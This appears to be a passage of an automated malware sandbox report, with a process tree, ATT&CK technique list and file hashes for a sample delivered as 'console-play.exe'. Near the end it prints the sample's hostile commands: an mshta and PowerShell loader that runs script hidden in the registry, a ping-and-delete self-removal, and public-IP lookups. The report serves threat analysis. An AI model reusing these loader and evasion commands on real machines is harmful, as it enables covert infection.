    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:8
    3⤵
    PID:4148
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:8
    3⤵
    PID:4604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6892 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8
    3⤵
    PID:4684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5692 /prefetch:8
    3⤵
    PID:4728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
    3⤵
    PID:4760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:8
    3⤵
    PID:4832
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:8
    3⤵
    PID:4800
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:8
    3⤵
    PID:4880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:8
    3⤵
    PID:4964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:8
    3⤵
    PID:4264
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:8
    3⤵
    PID:4300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:8
    3⤵
    PID:1772
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:8
    3⤵
    PID:4524
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:8
    3⤵
    PID:4508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6348 /prefetch:8
    3⤵
    PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7716 /prefetch:8
    3⤵
    PID:4828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
    3⤵
    PID:4776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3580 /prefetch:8
    3⤵
    PID:4976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
    3⤵
    PID:4896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
    3⤵
    PID:4364
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:8
    3⤵
    PID:4604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
    3⤵
    PID:5068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:8
    3⤵
    PID:2820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:8
    3⤵
    PID:4620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:8
    3⤵
    PID:4244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7444 /prefetch:8
    3⤵
    PID:4760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:8
    3⤵
    PID:4240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:8
    3⤵
    PID:2844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:8
    3⤵
    PID:4800
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8064 /prefetch:1
    3⤵
    PID:3304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
    3⤵
    PID:1676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7676 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
    3⤵
    PID:184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6636 /prefetch:8
    3⤵
    PID:5000
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8092 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:8
    3⤵
    PID:4880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7052 /prefetch:8
    3⤵
    PID:4816
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:8
    3⤵
    PID:4636
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5148 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:8
    3⤵
    PID:2308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8104 /prefetch:8
    3⤵
    PID:4408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8
    3⤵
    PID:4908
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8076 /prefetch:8
    3⤵
    PID:3128
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:8
    3⤵
    PID:4304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:8
    3⤵
    PID:1552
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
    3⤵
    PID:2648
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3640 /prefetch:8
    3⤵
    PID:4964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:8
    3⤵
    PID:4492
- - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe
    "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=YuUakMh14Of+ifD3E9DcDUMUHiNZQ9R9gAYwtYM+ --registry-suffix=ESET --srt-field-trial-group-name=Off
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:4100
  - - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=92.267.200 --initial-client-data=0x264,0x268,0x26c,0x234,0x270,0x7ff6751062b0,0x7ff6751062c0,0x7ff6751062d0
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4592
  - - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4100_NBCOBJYSBTVZUKGX" --sandboxed-process-id=2 --init-done-notifier=740 --sandbox-mojo-pipe-token=3948679689021656927 --mojo-platform-channel-handle=716 --engine=2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4100_NBCOBJYSBTVZUKGX" --sandboxed-process-id=3 --init-done-notifier=944 --sandbox-mojo-pipe-token=10498607416324527051 --mojo-platform-channel-handle=940
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:8
    3⤵
    PID:4108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7516 /prefetch:8
    3⤵
    PID:5024
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:8
    3⤵
    PID:4072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:8
    3⤵
    PID:4504
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>M9de='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(M9de).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\069CA786-AD43-2851-679A-31DC8B6EF5D0\\\MaskStop'));if(!window.flag)close()</script>"
  2⤵
  PID:4400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\069CA786-AD43-2851-679A-31DC8B6EF5D0").ComputerSettings))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:4736
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zexki0ea\zexki0ea.cmdline"
      4⤵
      PID:4696
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A8B.tmp" "c:\Users\Admin\AppData\Local\Temp\zexki0ea\CSC1651E803854A45489885A281FB4B967.TMP"
        5⤵
        
        PID:1824
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5zyi42l\x5zyi42l.cmdline"
      4⤵
      PID:4180
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BC3.tmp" "c:\Users\Admin\AppData\Local\Temp\x5zyi42l\CSCF0F7FE236F85430185A55891FE74D919.TMP"
        5⤵
        
        PID:4428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  PID:3244
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4252
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\81DD.bi1"
  2⤵
  PID:4160
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:2052
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\86C9.bi1"
  2⤵
  PID:5012
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\86C9.bi1"
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\81DD.bi1"
  2⤵
  PID:2940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5
045eca8799b12fe16861f0e5f4503ff2

SHA1
f093b2fc72fce4daadab47fbec01a9579cc71a5f

SHA256
97808e4552a2892352322ff4d8333dbf1acea73c330ed09b96d9b758cf4f6fd9

SHA512
612c6549cd79b3213cbb9d53435885ee52d2cbc0b3a1a582e788c22e408fe33cad0b942c7b7876a32e61272e2e1e5cb1e3fc9e5761395fab789369c35f159fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp

MD5
8a24adf60923719e71306f56deb49ebc

SHA1
e098600fd5a98bc37d0d887e705a32a54bf4ae84

SHA256
221643457442624e98646e2e6f8a6ec7d8d79f9830d13cb168f69e60e69b0085

SHA512
dfbc2fcd389e07c4a2fcf7ce440f079022bc40c1b957c6bd89e7dc33695c0e80b5ecbcc823c44c68f80ce791ee065d39d7042b0579f736c786451f0183c6c02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp

MD5
8a24adf60923719e71306f56deb49ebc

SHA1
e098600fd5a98bc37d0d887e705a32a54bf4ae84

SHA256
221643457442624e98646e2e6f8a6ec7d8d79f9830d13cb168f69e60e69b0085

SHA512
dfbc2fcd389e07c4a2fcf7ce440f079022bc40c1b957c6bd89e7dc33695c0e80b5ecbcc823c44c68f80ce791ee065d39d7042b0579f736c786451f0183c6c02a

Download Submit
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe

MD5
e70951807abdec39daefa9a8df9dec15

SHA1
15a7b0f9c04d5f6bba477d91b502b4e24c1127f6

SHA256
dee1253761af168e331e8909cf6afb20b40a95a34400d9717773a77258ac62e6

SHA512
bd87a44e078a9e589b70419f9ba876e067bc549679962faf0a5f96d5f0d0167654adb53b2b10e065de8f705bfa51b0fed09fb3ce28d5014e4260b96dc64fa624

Download Submit
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe

MD5
e70951807abdec39daefa9a8df9dec15

SHA1
15a7b0f9c04d5f6bba477d91b502b4e24c1127f6

SHA256
dee1253761af168e331e8909cf6afb20b40a95a34400d9717773a77258ac62e6

SHA512
bd87a44e078a9e589b70419f9ba876e067bc549679962faf0a5f96d5f0d0167654adb53b2b10e065de8f705bfa51b0fed09fb3ce28d5014e4260b96dc64fa624

Download Submit
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\cds.xml

MD5
2b622a85fd2b0b5531c86301818ceb2f

SHA1
5e1d127789e78683ce3deee1fd3e38f358bc50c2

SHA256
58489a55f9eb210b9e472ca21621ce544e03a2e026f0fa103c1a58102d39c025

SHA512
938d7ac9239568536a341c057a44142faad4921bbff5bcc76a89b0b4ed5343f324a46e6c533a9673434286673c4b5efbe4a8156d10c20a2760389ac785a34ce4

Download Submit
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\qclp.dll

MD5
4240767ecbcecd84f3c90d0ee889460c

SHA1
d390f9e165408864dda6c925dfe6627c557a6b24

SHA256
1d1e59b6a67e1f4ecc8516c384291655d4c51f7f91168e6b593f5f8919bffdc3

SHA512
89fe2e6cc6a1480d8a42efe2b694b3b677967b7656326fcf8453c7f484d92f450be65c6c2639cd08131dbc58e0d34ee696bf1b263227e34d2ac91c4aaa7aee61

Download Submit
C:\Users\Admin\Downloads\console-play.exe

MD5
a43be7341e3d13810d20b9e64e329c83

SHA1
ad582a30ba365885be34fe503c744088d08b4baa

SHA256
e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464

SHA512
cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877

Download Submit
C:\Users\Admin\Downloads\console-play.exe

MD5
a43be7341e3d13810d20b9e64e329c83

SHA1
ad582a30ba365885be34fe503c744088d08b4baa

SHA256
e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464

SHA512
